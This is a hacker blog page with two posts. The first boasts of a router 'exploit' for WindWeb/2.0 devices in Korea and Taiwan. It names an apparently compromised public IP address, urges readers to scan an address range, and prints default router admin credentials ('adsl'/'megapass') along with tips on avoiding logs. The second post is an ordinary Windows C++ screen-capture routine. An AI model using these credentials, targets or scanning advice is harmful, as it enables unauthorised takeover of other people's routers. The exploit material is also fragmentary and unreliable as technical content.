Help pay for xds lawyer fees.
LR

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

screen capture for windows by Mouse

Posted on 17th September 2011 in Codes

This requires jpeglib and you can get jpeglib from http://www.ijg.org/
this is for windows 


#include <stdio.h>
#include <windows.h>

extern "C"
{
#include <jpeglib.h>
}
#pragma comment(lib,"JpegLib.lib")
int jpegCapture(char* filename, int quality)
{
HBITMAP hBMP;
HWND desktopWnd;
int width;
int height;
RECT rc;
HDC hDC;
HDC hDCmem;

struct jpeg_compress_struct cinfo;
struct jpeg_error_mgr jerr;
FILE * outfile;
JSAMPLE* scanline;
COLORREF pixel;
desktopWnd = GetDesktopWindow();
GetWindowRect(desktopWnd, &rc);
width = rc.right - rc.left;
height = rc.bottom - rc.top;
hDC = GetDC(desktopWnd);
hDCmem = CreateCompatibleDC(hDC);
hBMP = CreateCompatibleBitmap(hDC, width, height);
if(hBMP == NULL) return -2;
SelectObject(hDCmem, hBMP);
BitBlt(hDCmem, 0, 0, width, height, hDC, rc.left, rc.top, SRCCOPY);
cinfo.err = jpeg_std_error(&jerr);
jpeg_create_compress(&cinfo);
outfile = fopen(filename, "wb");
if(outfile == NULL) return -1;
jpeg_stdio_dest(&cinfo, outfile);
cinfo.image_width = width;
cinfo.image_height = height;
cinfo.input_components = 3;
cinfo.in_color_space = JCS_RGB;
jpeg_set_defaults(&cinfo);
if(quality < 0) quality = 0;
if(quality > 100) quality = 100;
jpeg_set_quality(&cinfo, quality, FALSE);
jpeg_start_compress(&cinfo, TRUE);
scanline = new JSAMPLE[width*3];
for(int posy = 0; posy < height; posy++)
{
for(int posx = 0; posx < width; posx++)
{
pixel = GetPixel(hDCmem, posx, posy);
scanline[posx*3+0] = GetRValue(pixel);
scanline[posx*3+1] = GetGValue(pixel);
scanline[posx*3+2] = GetBValue(pixel);
}
jpeg_write_scanlines(&cinfo, &scanline, 1);
}
jpeg_finish_compress(&cinfo);

jpeg_destroy_compress(&cinfo);
delete scanline;
fclose(outfile);
DeleteDC(hDCmem);
ReleaseDC(desktopWnd, hDC);
return 0;
}

int main() {
printf("Jpeg screen cap\n");
jpegCapture("lol.jpg",100);
exit(0);
return 0;
}
comments: 4 » tags: , , , ,